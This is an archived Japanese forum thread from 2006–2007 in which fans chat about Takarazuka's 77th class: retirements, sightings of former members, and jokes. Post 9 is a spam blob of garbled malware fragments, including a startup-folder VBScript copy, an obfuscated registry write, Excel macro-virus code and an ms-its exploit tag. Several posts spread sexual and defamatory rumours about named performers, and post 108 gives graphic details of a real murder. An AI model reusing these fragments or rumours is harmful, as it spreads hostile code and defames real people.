5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【77期を語ろう】これからどうなる? その2

1 :名無しさん@花束いっぱい。:2006/10/17(火) 23:47:58 ID:x9Lfo+ux
鈴懸三由岐 春野寿美礼 北嶋麻実 安蘭けい
女帝といわれたハナちゃんの退団、エンディの11月退団、コムちゃん、マコちゃん、ゆっさんの12月退団で来年には在団生もあと4人。

在団生・卒業生関係なく77期をのんびりマターリ語りましょう。

レス番980を踏んだら、次スレ立てをお願いします。

前スレはこちら
【77期を語ろう】これからどうなる?
http://hobby8.2ch.net/test/read.cgi/siki/1105317885/

2 :名無しさん@花束いっぱい:2006/10/17(火) 23:49:24 ID:vgcmzaeD
2ならまちお理事誕生

3 :名無しさん@花束いっぱい。:2006/10/17(火) 23:51:38 ID:zBOzVPSU
1タン乙〜!

4 :名無しさん@花束いっぱい。:2006/10/17(火) 23:51:38 ID:0l66JGwi
乙です。
はいどーぞ( ^^) _旦~~

5 :名無しさん@花束いっぱい。:2006/10/17(火) 23:59:37 ID:kr9ts+Tt
5ならコムは女の子出産

6 :名無しさん@花束いっぱい。:2006/10/18(水) 00:00:03 ID:x9Lfo+ux
ども>4

77期だったら、カズキとエミさまが好きだったなぁ

7 :名無しさん@花束いっぱい。:2006/10/18(水) 00:03:00 ID:O6AwCUBr
7だったらまちお以外全員退団

8 :前スレ981:2006/10/18(水) 00:03:58 ID:5TXEAGlZ
>1
スレ立ててくれてdでつ。
前スレ落ちる前でよかった〜

9 :<body onload=window()>:2006/10/18(水) 01:28:07 ID:ipJhnjMa
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


10 :名無しさん@花束いっぱい。:2006/10/18(水) 06:21:03 ID:U0RYZF6J
としこはんはオサと一緒のような気がする。
で、そのオサもやっても後2、3作。先は見えてる。
とうこもトップ内定でカウントダウンの開始。



まちお様だけ全く先が読めないねw

11 :名無しさん@花束いっぱい。:2006/10/18(水) 10:03:56 ID:f0qDpK2t
まちお様管理職までカウントダウン開始

12 :名無しさん@花束いっぱい。:2006/10/19(木) 18:02:05 ID:wbdZjdT6
最後に残るのは、やっぱりマツィオ先輩?

13 :名無しさん@花束いっぱい。:2006/10/22(日) 17:27:00 ID:ktN7F2tj
前スレってdat落ち?

14 :名無しさん@花束いっぱい。:2006/10/22(日) 17:57:11 ID:Rwth11J9
う〜思い入れの強い77期のラス1がまちお様になってしまうことだけは避けたいのだが・・・
この期、もっと管理職になると思ってたのにな。

15 :名無しさん@花束いっぱい。:2006/10/22(日) 18:00:21 ID:4+22uA10
77期で唯一処女臭いマチオ様

16 :名無しさん@花束いっぱい。:2006/10/22(日) 19:30:33 ID:1b3t9h30
いやいや案外トウコも処(ry

17 :名無しさん@花束いっぱい。:2006/10/22(日) 19:40:44 ID:RbAECtDM
ケロたんやっぱり帰ってくるよ
東宝みるとオモ

18 :名無しさん@花束いっぱい。:2006/10/23(月) 02:12:10 ID:dlzYPL2+
処女はおハナたん。

19 :名無しさん@花束いっぱい。:2006/10/23(月) 08:47:53 ID:x7jhdb42
>>17
ソースある?

20 :名無しさん@花束いっぱい。:2006/10/23(月) 18:51:56 ID:Cd5MKcEN
17タンじゃないけどソースあるよ
ラスト一週間以内に絶対観劇する
楽あたりお手伝いに行くのかも
見かけたら報告よろしく

21 :名無しさん@花束いっぱい。:2006/10/24(火) 15:36:25 ID:x26FacVA
すみません、ケロさんどこに滞在されてたのでしょう?
質問スレで誘導があったので来ました

22 :イン:2006/10/24(火) 16:39:35 ID:lFpvuF82
私もケロさんのこと知りたい

23 :名無しさん@花束いっぱい。:2006/10/24(火) 20:56:04 ID:9Qc/8JCj
ケロさんは入浴です。
これでわからなければ諦めて下さいw

24 :イン:2006/10/24(火) 22:36:15 ID:lFpvuF82
やっぱりそぉなんですかぁ!!帰ってこないかな(´ε`)

25 :名無しさん@花束いっぱい。:2006/10/24(火) 22:36:57 ID:x26FacVA
>>23
これですっきりしました!本当にありがとうございます。

26 :名無しさん@花束いっぱい:2006/10/25(水) 21:50:51 ID:mMPil1De
やべえ。まちお様が袴着て退団挨拶をしてる夢を見たw。

何故か、おさ・こむ・とうこ・お花に囲まれて泣きながら挨拶してたよw。

27 :名無しさん@花束いっぱい。:2006/10/25(水) 23:00:07 ID:Bsxsq+p3
>>26
それが現実だったら・・・

28 :名無しさん@花束いっぱい。:2006/10/25(水) 23:48:06 ID:QPJJzJte
まちおが退団とかありえねw

29 :名無しさん@花束いっぱい。:2006/10/26(木) 00:52:02 ID:n8U55Je9
>>27
同感。

30 :名無しさん@花束いっぱい。:2006/10/26(木) 01:25:24 ID:ww4QPJx8
warosu

31 :名無しさん@花束いっぱい。:2006/10/28(土) 02:31:42 ID:VyCAFDFT
>>26なんてゴージャスな面子w

32 :名無しさん@花束いっぱい。:2006/10/28(土) 04:25:06 ID:Lvt3zZEv
スイカちゃん音痴すぎるよ〜w

33 :名無しさん@花束いっぱい。:2006/10/30(月) 00:28:14 ID:K77/E3bm
コムムラ楽あげ

34 :名無しさん@花束いっぱい。:2006/10/30(月) 00:30:29 ID:I4SF/hXN
IDすごい

35 :名無しさん@花束いっぱい。:2006/10/30(月) 19:02:33 ID:sYW9a0d3
コムマコゆっさんへの同期花渡しはオサとすっちゃんだったそうで。
マツィオさまは間に合わなかったみたいだねwww

36 :名無しさん@花束いっぱい。:2006/10/30(月) 19:26:40 ID:oKql+yVS
整形の見破り方!


今や、美人の約70%は整形で作られている改造人間である。

ほら貴方の隣…美人な姉さん、可愛いギャルも、イケメンも、清楚そうなあの娘まで?! 

鼻、L型は豚鼻出来ない。I型でも定着してない場合、左右に動かすと鼻筋が反対に動く。
鼻筋を触ると大概真っすぐな異物が入っているのがわかることもある。レントゲンに写る。

目、埋没は瞬きする時不自然なことがある。強い光で目蓋を透かしてみると糸が見える場合がある。
切開はすっぴん時に皺部分を広げて観察すると天然には絶対にないうっすらとした傷がある。

包茎、ツートンカラー。

豊胸、仰向けになった時にもなくならない。ラウンド型はデコルテ部分まで盛り上がるが、アナトミカル型は一見しただけではわかりにくく、触っても硬縮がなければ張りがある程度で柔らかいので元胸があればばれにくい。
しかし、自然光の下でよーく見ると脇の皺か胸の下、乳輪にそって傷がある。
レントゲンに写るが素人は判断出来ない。


さー今夜はオフィスで家庭で学校で、飲み屋でもすっぴんなめなめ豚っ鼻&揉み会するぞ!!( ̄^ ̄)

37 :名無しさん@花束いっぱい。:2006/10/31(火) 08:17:37 ID:jQHEyGpG
トウコの処女は女によって何年も前に奪われてます

38 :名無しさん@花束いっぱい。:2006/11/01(水) 10:40:00 ID:W660kDmR
ポスタースレのヘイズのポスターご覧になりまして?
とうこさんとお花様の77期コンビが見られますよw

39 :名無しさん@花束いっぱい。:2006/11/03(金) 21:31:17 ID:8irDDU+H
今日も夢の中に出てきたマチオ様。

紋付袴、頭にはピンクと白のカスミ草で作ったでっかいカチューシャ、
同期からもらうお花は向日葵と黄色いポンポン菊で作ったハートの形。
泣きながら上目遣いで左右を見、しゃくりあげながら退団のご挨拶。
霧ヤンが「無理そうなら挨拶いらんのとちがいます?」というと、トウコが
「変わったろか?」マチオ様に聞く。オサ・コム・アサが「がんばれ」とお相撲さんに
するようにマチオ様をバンバン叩く。おっちょんとお花がマチオ様そっちのけで、
お手伝いに来てたケロさんとおしゃべり。しかし、しゃくりあげ続けるマチオ様。
そこへトランペットが出だしをかました「さよなら皆様」を演奏し始め・・・。

そこで目が覚めた。マチオ様(・∀・)ナンカキニナルワー、コノミジャナイケド。

40 :名無しさん@花束いっぱい。:2006/11/03(金) 21:59:56 ID:8irDDU+H
あ、何でこんなに気になるかわかった。(・∀・)ノ
すっごい前に、とある場所でマチオ様がツーステップで「あ〜さの太陽
サンバ〜(サンバッ!)」って歌ってるのを見たことがあるからだわ。
それで潜在意識の中に入り込んできやがったんだな。

41 :名無しさん@花束いっぱい。:2006/11/06(月) 05:01:06 ID:rTW6ySz7
マチオ様、ヤ○オクで若い頃の写真が出てたね。
とうこさんの隣に。


今日もどこかでフレームイン・・・

42 :名無しさん@花束いっぱい。:2006/11/06(月) 09:09:02 ID:bWN65l+b
まちお様のお顔を見る度に幸せになれる気がします

43 :名無しさん@花束いっぱい。:2006/11/06(月) 10:32:19 ID:0afCDNXc
>40
まちおってツーステップ出来るの?
どこかのスレ(オクラホマ関連)で出来ないと書いてあったけど…

44 :名無しさん@花束いっぱい。:2006/11/06(月) 14:13:45 ID:rTW6ySz7
>>43
「マチオの『なんちゃってツーステップ』」ってことだろうw

45 :名無しさん@花束いっぱい。:2006/11/06(月) 22:25:52 ID:YmOO9iG8
マチオ先輩のなんちゃってツーステップ、見てええええ( ^ω^) サンバッ!

46 :名無しさん@花束いっぱい。:2006/11/07(火) 13:07:09 ID:d7AsoOHR
何でとうこさんとコムちゃん仲たがいしちゃったんですか?
最近、ワンダースリーを見て、おっちょんとのトリオが大好きになったので気になります。

47 :名無しさん@花束いっぱい。:2006/11/07(火) 15:51:12 ID:l0yEhtJ4
してないでしょ

48 :名無しさん@花束いっぱい。:2006/11/07(火) 17:46:36 ID:B3eOSavs
('-^*)/エヘヘ
IDにおさちゃん登場なので記念パピコ




49 :名無しさん@花束いっぱい。:2006/11/07(火) 17:50:41 ID:uHrOoI5N
おさとトウコは千春兄貴にヤられた繋がり

50 :名無しさん@花束いっぱい。:2006/11/07(火) 17:59:20 ID:/rkkYSJM
雪組元だんご三兄弟は未だに仲良いよ!

51 :名無しさん@花束いっぱい。:2006/11/07(火) 18:01:44 ID:Ra6H2B43
ケロたん、はやく観にこないかな。

52 :名無しさん@花束いっぱい。:2006/11/07(火) 18:32:05 ID:b+aw4Mw4
凱旋門の時に一度派手に喧嘩したが今は仲直りしてる。>コムとうこ

53 :名無しさん@花束いっぱい。:2006/11/07(火) 18:34:29 ID:uHrOoI5N
別れ話の縺れですか?
昔付き合ってたわよね

54 :名無しさん@花束いっぱい。:2006/11/07(火) 19:02:57 ID:d7AsoOHR
>50>52タソ
ありがd♪安心しました。

55 :名無しさん@花束いっぱい。:2006/11/07(火) 23:04:20 ID:0sqgP4UP
コムファン歴浅いがメモリアルブック読んだらいろんなことがわかったわ。

56 :名無しさん@花束いっぱい。:2006/11/08(水) 00:10:39 ID:vmJOa9CS
ケロたんきた。稽古場に。

57 :名無しさん@花束いっぱい。:2006/11/08(水) 01:33:20 ID:Auh1hMhU
そっか…。できたら詳しく聞きたいです。

58 :名無しさん@花束いっぱい。:2006/11/08(水) 01:37:07 ID:JV7YDnsO
今稽古してるのって雪だけじゃろ?

コムマコゆっさんでトリプル同期いるけど、ムラに来たのか?
出没予想(?)は東宝って言われてたからアヤシクネ?

59 :名無しさん@花束いっぱい。:2006/11/08(水) 02:27:51 ID:sGP1pb6A
いや、稽古場に行って雪組さん
見てきたようですが…

60 :名無しさん@花束いっぱい。:2006/11/08(水) 02:50:46 ID:JV7YDnsO
>59
ガチならいいんだ、疑ってスマソ
ただ他のトコロでそれらしきカキコがないんでどうなんだ?とオモタだけだから


後は星東宝への出没も期待していいんだろうか…?
ってトコかなw

61 :名無しさん@花束いっぱい。:2006/11/08(水) 08:15:53 ID:OzOebHM9
ガチっすよ。<雪稽古場にケロ


62 :名無しさん@花束いっぱい。:2006/11/08(水) 09:32:14 ID:vmJOa9CS
西でも東でも出没したっておかしくないだろう?
日本にいるんだからw 通し稽古を見たもよう…

63 :名無しさん@花束いっぱい。:2006/11/08(水) 09:41:49 ID:vmJOa9CS
けろたん、実家ムラだもん。

64 :名無しさん@花束いっぱい。:2006/11/08(水) 12:29:39 ID:D25MZKdH
けろってだれ

65 :名無しさん@花束いっぱい。:2006/11/08(水) 12:54:33 ID:JV7YDnsO
>62,63
そりゃおかしくはないけど、東京オンリーで星千秋楽辺りとそのまま雪初日を見るのか?と予想されてたんだよ、
最初帰国する話が出た時に

ムラ(宝塚)に実家があるのも重々承知してるよ、ツッコまなくてもw
雪の新公時代からずっと気になる存在だったし

66 :名無しさん@花束いっぱい。:2006/11/08(水) 13:53:43 ID:OzOebHM9
雪初日まで日本にいないからじゃない?

67 :名無しさん@花束いっぱい。:2006/11/08(水) 14:52:24 ID:7Rtr15X4
あと一週間しかいないからね

68 :名無しさん@花束いっぱい。:2006/11/08(水) 23:52:33 ID:qLwWk8SU
今日浜松で生オサを見て惚れてしまったがな
オサルドルフかっこよす

69 :名無しさん@花束いっぱい。:2006/11/09(木) 17:05:04 ID:3m3xtlxZ
>>64
今更けろって誰って・・・。

70 :名無しさん@花束いっぱい。:2006/11/09(木) 18:55:35 ID:6i4wyddT
退団してるんだもん。ほんとに知らないかもよ。

71 :名無しさん@花束いっぱい。:2006/11/10(金) 22:36:24 ID:Lc0iiALK
最近クリスマスソングを聞くと胸が痛みます・・・・

72 :名無しさん@花束いっぱい。:2006/11/11(土) 21:05:30 ID:K8Er42St
ケロさん 削除/引用
No.201-3691 - 2006/11/11 (土) 20:54:27 - 星組大好き - ID:cpYHm/Es
NYで暮らしている汐美真帆さんが数日前から帰宝されていましたが、
昨日東京に向かいました。
昨夜のサヨナラショーのお稽古を観て、今日明日は楽屋内のはず。
エンディのお世話やわたるさんやトウコちゃんとの再会・・
大事な時に顔をみせにきてくれて星組ファンとして嬉しく思います。



73 :名無しさん@花束いっぱい。:2006/11/12(日) 23:41:13 ID:w32xOIQK
ケロさんに遭遇した人、うらやましいっす。

74 :名無しさん@花束いっぱい。:2006/11/13(月) 23:18:35 ID:3abFLZ9w
エンディお疲れさま

75 :名無しさん@花束いっぱい。:2006/11/14(火) 18:24:30 ID:CWhq3atu
マチオ様、まだまだがんばるつもりなのですね・・・

76 :名無しさん@花束いっぱい。:2006/11/14(火) 19:27:18 ID:JPStd8rA
月組退団者まちお様の名前がなく安心しました

77 :名無しさん@花束いっぱい。:2006/11/14(火) 19:56:31 ID:gffoBAk3
千秋楽後、歌劇にひっそり

「千秋楽付けで退団いたしました。」

と発表されるのがらしい辞め方だと思います。

78 :名無しさん@花束いっぱい。:2006/11/14(火) 20:05:05 ID:BM3WPBfG
いや、集合日付けでのハピョーこそふさわしい…

79 :名無しさん@花束いっぱい。:2006/11/14(火) 21:03:50 ID:htIxD1Mu
マッチ先輩が退団するときには
退団同期の袴姿のポートに写りこんでそう。

80 :名無しさん@花束いっぱい。:2006/11/14(火) 21:42:22 ID:CWhq3atu
思い切ってグラフ表紙にも写っちゃたりして@マティオ先輩

81 :名無しさん@花束いっぱい。:2006/11/14(火) 22:16:31 ID:oIkUvF5p
いややっぱりマドンナでしょう

82 :名無しさん@花束いっぱい。:2006/11/14(火) 22:23:32 ID:CWhq3atu
自費でシール作って歌劇の間にはさんであったりして。

83 :名無しさん@花束いっぱい。:2006/11/14(火) 23:41:05 ID:tPE8CqN1
自費wwwww

84 :名無しさん@花束いっぱい。:2006/11/15(水) 23:25:41 ID:8KJI0QIJ
来年の今頃には
“あ〜 このスレも来年からはマティオ先輩専用すれかぁ…”
って、カキコしてたりして(´・ω・`)

85 :名無しさん@花束いっぱい。:2006/11/15(水) 23:36:41 ID:1zAZDXjC
そーいえば、とおるちゃんが一人舞台するんだってね
ENAKに載ってた

86 :名無しさん@花束いっぱい。:2006/11/17(金) 23:17:15 ID:KIi9zGMC
>>84そのうち、かつての女帝スレみたいになるんだろうか・・・((((;゜Д゜)))

87 :名無しさん@花束いっぱい。:2006/11/18(土) 00:05:48 ID:EplpIxrZ
コムちゃん公演中なのに何故かマッチョ先輩77スレ独占!
あえてのマッチョですかWW

88 :名無しさん@花束いっぱい。:2006/11/18(土) 00:11:14 ID:pg+BU4Fm
いや、てかこのスレ1から数えると
90弱レス中34レスくらい全部マッィォ絡みだもんww

89 :名無しさん@花束いっぱい。:2006/11/18(土) 14:49:38 ID:Gi21jSTv
趣味・・・歯磨き
特技・・・フラフープ

そんなマティオ様が大好きです

90 :名無しさん@花束いっぱい。:2006/11/19(日) 08:36:49 ID:QPLoKQs7
age

91 :名無しさん@花束いっぱい。:2006/11/19(日) 15:58:08 ID:1jXJjGYa
マティオさん、前にクリスマスツリーの形の帽子かぶってケミカルウオッシュの
ジーンズはいて楽しそうにしてたのが強烈すぎて忘れられない。おまけに
何回洗濯したんだよっていうトレーナー。色あせすぎだった。
あれはどこで見たんだったかな?

92 :名無しさん@花束いっぱい。:2006/11/19(日) 16:01:20 ID:PsoVYJXC
マチオ様は純粋な心をお餅な方です
きっと一生処女で妖精さんになるでしょう

93 :名無しさん@花束いっぱい。:2006/11/19(日) 16:06:40 ID:PhAOOOWd
最近90周年運動会のDVDみた。入場行進のマティオ様、顔面フラフープ技がまぶしかったお…。

94 :名無しさん@花束いっぱい。:2006/11/19(日) 16:57:38 ID:UqWTTH0L
目は行くけれど好きにはなれない。それがマチオ

95 :名無しさん@花束いっぱい。:2006/11/19(日) 20:33:47 ID:WMp5VMVz
コムちゃんファンは公演中で忙しいんでしょ。
マコさん、ゆっさんファンも。

96 :名無しさん@花束いっぱい。:2006/11/19(日) 23:35:57 ID:PsoVYJXC
運動会のマチオ様と言えば綱引きで優勝して
おっちょんがサエコにインタビューしてる時に
後ろに旗を振りながら近づいてくる青アフロのマチオ様が好きです

97 :名無しさん@花束いっぱい。:2006/11/24(金) 14:17:03 ID:dmwi4ezv
春野寿美礼ってあの顔でヤリマンで昔は朝帰りばっかだったんだね

98 :名無しさん@花束いっぱい。:2006/11/24(金) 14:24:33 ID:1It+MSbs
>>97
その発言は酷すぎるな。名誉毀損で告訴されたら完全に負けるな。
一応、歌劇団へ通報しとくよ。

99 :名無しさん@花束いっぱい。:2006/11/24(金) 14:28:16 ID:dmwi4ezv
昔2に書かれてたことだし
本間なんやろ?

100 :名無しさん@花束いっぱい。:2006/11/24(金) 16:10:04 ID:rw3dlgYU
100マティオ

101 :名無しさん@花束いっぱい。:2006/11/24(金) 16:22:18 ID:FPhQDvLh
名誉毀損はその内容の真偽に関わらず成立するよ。
侮蔑的な表現を含んでいるから、訴えられたら格段に不利だね。


まあ、在位スレがスルーされてたんだからw大丈夫だろうと思うが

102 :名無しさん@花束いっぱい。:2006/11/24(金) 20:07:46 ID:sD1tfGTy
こんな事で?じゃあ何人のジェンヌが訴えられる事か…。

103 :名無しさん@花束いっぱい。:2006/11/24(金) 20:53:16 ID:GxTA6w5j
>102
それじゃ逆でしょ

104 :名無しさん@花束いっぱい。:2006/11/24(金) 22:19:40 ID:sD1tfGTy
間違えちゃった!

105 :名無しさん@花束いっぱい。:2006/11/24(金) 22:56:11 ID:94WaXapj
逮捕d=(^o^)=b

106 :名無しさん@花束いっぱい。:2006/12/02(土) 17:16:24 ID:XJeUq4m8
皆様事件です
某画像交換サイトにPCで作られたであろう大真面目なマティオ様のメール受信画があります

107 :名無しさん@花束いっぱい。:2006/12/02(土) 17:27:02 ID:mN05rMkp
テラミタス!

108 :名無しさん@花束いっぱい。:2006/12/02(土) 17:38:33 ID:jqGIFopX

 婦女暴行事件・・・・少年たちは罪の重さを実感していません。
                  
 例えば、足立区綾瀬で女子高校生が帰宅中に少年らに拉致された事件です。
女子高生は少年の自宅(両親も同居していました。)に40日間監禁され繰り返し
暴行され、最後には凄惨なリンチの末に殺害されました。監禁中に食事はほとんど
食べさせてもらえず、最後には尿まで飲まされたそうです。少年らは 女子高校生を
音楽に合わせて全裸で踊らさ、歌の合間に皆で一斉に蹴ったり、陰毛を剃ったりし
ました。 発見された遺体は、歯が殆ど折れ全身に火傷を負い、性器と肛門には
オロナミンCの瓶が刺ささっていました。 主犯以外の少年たちの服役期間は
裁判日数を除くため最長でも6年でした。 (女子高生コンクリート詰め殺人事件)



109 :名無しさん@花束いっぱい。:2006/12/02(土) 23:09:37 ID:pp49JOai
8でナルちゃんが結婚したって。ほんとかな。

110 :名無しさん@花束いっぱい。:2006/12/02(土) 23:20:57 ID:wHWTAKam
>109
成瀬公式HPの掲示板によると、ファンクラブの会報に報告ありだそうだ>入籍

111 :名無しさん@花束いっぱい。:2006/12/02(土) 23:34:24 ID:pp49JOai
>>110
そうなんだ。なんか想像つかないなw

112 :名無しさん@花束いっぱい。:2006/12/03(日) 00:43:27 ID:GWrE1H4E
何はともあれおめでとう!!

113 :名無しさん@花束いっぱい。:2006/12/03(日) 00:48:57 ID:4XVBNA1Q
そりゃめでたい。おっちょんオメ!

114 :名無しさん@花束いっぱい。:2006/12/03(日) 05:05:12 ID:f6YnCTuW
おっちょんかわいい奥様になるんだろうな〜

115 :名無しさん@花束いっぱい。:2006/12/03(日) 12:24:49 ID:F0MidQO6
仕事どうするのかなー

116 :名無しさん@花束いっぱい。:2006/12/03(日) 21:58:53 ID:JYFU4FMJ
良い年して合コンばっかしてんじゃねぇよ糞ジェンヌ裏は取れてんだよ馬鹿ジェンヌ

117 :名無しさん@花束いっぱい。:2006/12/03(日) 22:37:09 ID:y1wc3CUw
ID:JYFU4FMJは基地外です

118 :名無しさん@花束いっぱい。:2006/12/03(日) 22:51:06 ID:GWrE1H4E
そうですね

119 :名無しさん@花束いっぱい。:2006/12/10(日) 20:37:43 ID:iYHD3lTx
 

120 :名無しさん@花束いっぱい。:2006/12/15(金) 02:11:18 ID:x6WKbLS/
オサたん誕生日おめでとう

とゆうことでageます

121 :名無しさん@花束いっぱい。:2006/12/15(金) 12:53:57 ID:Y2XqBOaU
おたおめ♪

122 :mihomya:2006/12/17(日) 02:17:34 ID:SPVVHTv9
わくわく

123 :名無しさん@花束いっぱい。:2006/12/18(月) 23:50:55 ID:H2T9M0Ej
おっちょん本日コムちゃん堕天使公演をご観劇。
男性の方とご一緒でした♪〜(ご入籍済みのお相手かな)


124 :名無しさん@花束いっぱい。:2006/12/23(土) 12:20:52 ID:tvERweW2
コム千秋楽あげ

125 :名無しさん@花束いっぱい。:2006/12/24(日) 00:16:31 ID:ia4CfaUo
↑フライングか?

126 :名無しさん@花束いっぱい。:2006/12/24(日) 01:57:23 ID:REEPT0Fe
おっちょん前楽ご観劇。

127 :名無しさん@花束いっぱい。:2006/12/24(日) 05:43:44 ID:rlMVjoxu
おっちょんのとなりのとなりのとなりの席だった

128 :名無しさん@花束いっぱい。:2006/12/24(日) 19:27:24 ID:dLkUdRa2
お花渡し、おささんが駆け付けてくれて、嬉しかった。
初めて生で見たけど、スタイル良くてかっこ良かったです。
渡す時にコムちゃんの耳元で『寂しい』っておっしゃってました。
そして抱擁。
いいもの見せていただきました。

まちお先輩は残念ながらお越しになれなかったようですw

129 :名無しさん@花束いっぱい。:2006/12/24(日) 21:15:49 ID:KwYEST8l
マジでチューするかと思ったw

130 :名無しさん@花束いっぱい。:2006/12/24(日) 23:41:37 ID:ia4CfaUo
>>128お稽古期間に来てたらまずいだろ、とマジレスww


しかしそれでも出てきそうなのがマチオクオリ(ry

131 :名無しさん@花束いっぱい。:2006/12/25(月) 10:48:11 ID:TXkLpn4e
先週マチオ先輩をDCで見ました。
普通、関係者は一階下手扉から目立たないよ〜に入って来ますが、マチオ先輩は 後ろのドアから客席階段を軽快に降りて行き 異彩を放っておられました。さすがでした。

132 :名無しさん@花束いっぱい。:2006/12/25(月) 18:02:03 ID:xmYZ7Mww
まちお先輩のお花渡し、怖いもの見たさで見たかった。

133 :名無しさん@花束いっぱい。:2006/12/25(月) 19:12:47 ID:oLX3OI3U
まちおスレ独占までカウントダウン!

134 :名無しさん@花束いっぱい。:2006/12/25(月) 22:28:06 ID:Rw5im6J4
そりゃあ、マチオ様がお花渡しに現れた盛り下がりようといったら・・・

135 :名無しさん@花束いっぱい。:2006/12/25(月) 23:02:09 ID:WXamKELO
IDにケロさん記念カキコ☆

136 :名無しさん@花束いっぱい。:2006/12/25(月) 23:25:35 ID:anb0uiaJ
お。情報スレからこっちに来てくれたんだねw
ありまとん♪

137 :名無しさん@花束いっぱい。:2007/01/05(金) 10:47:06 ID:Ri7bR1yL
やっぱりコムちゃんが好き。

138 :名無しさん@花束いっぱい。:2007/01/05(金) 11:29:55 ID:gKbMbzRv
エンディがヘイズ青年館初日、ご観劇だったって〜
ありがとう、エンディ〜

139 :名無しさん@花束いっぱい。:2007/01/07(日) 00:57:05 ID:o7UaUe09
ケロさん帰ってくるそうですね。

140 :名無しさん@花束いっぱい。:2007/01/09(火) 21:19:07 ID:J+qkOTGZ
今日のヘイズ夜は77期揃い踏み上げ

141 :名無しさん@花束いっぱい。:2007/01/09(火) 23:13:18 ID:f341HIr8
詳細キボン

142 :名無しさん@花束いっぱい。:2007/01/09(火) 23:20:58 ID:iREUic9u
コムマコナル揃いぶみでしょ。

143 :名無しさん@花束いっぱい。:2007/01/09(火) 23:24:37 ID:48cojoz3
ゆっさんもいました〜

144 :名無しさん@花束いっぱい。:2007/01/09(火) 23:29:30 ID:mo7EPYDv
優花えりちゃんもいたよ〜

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)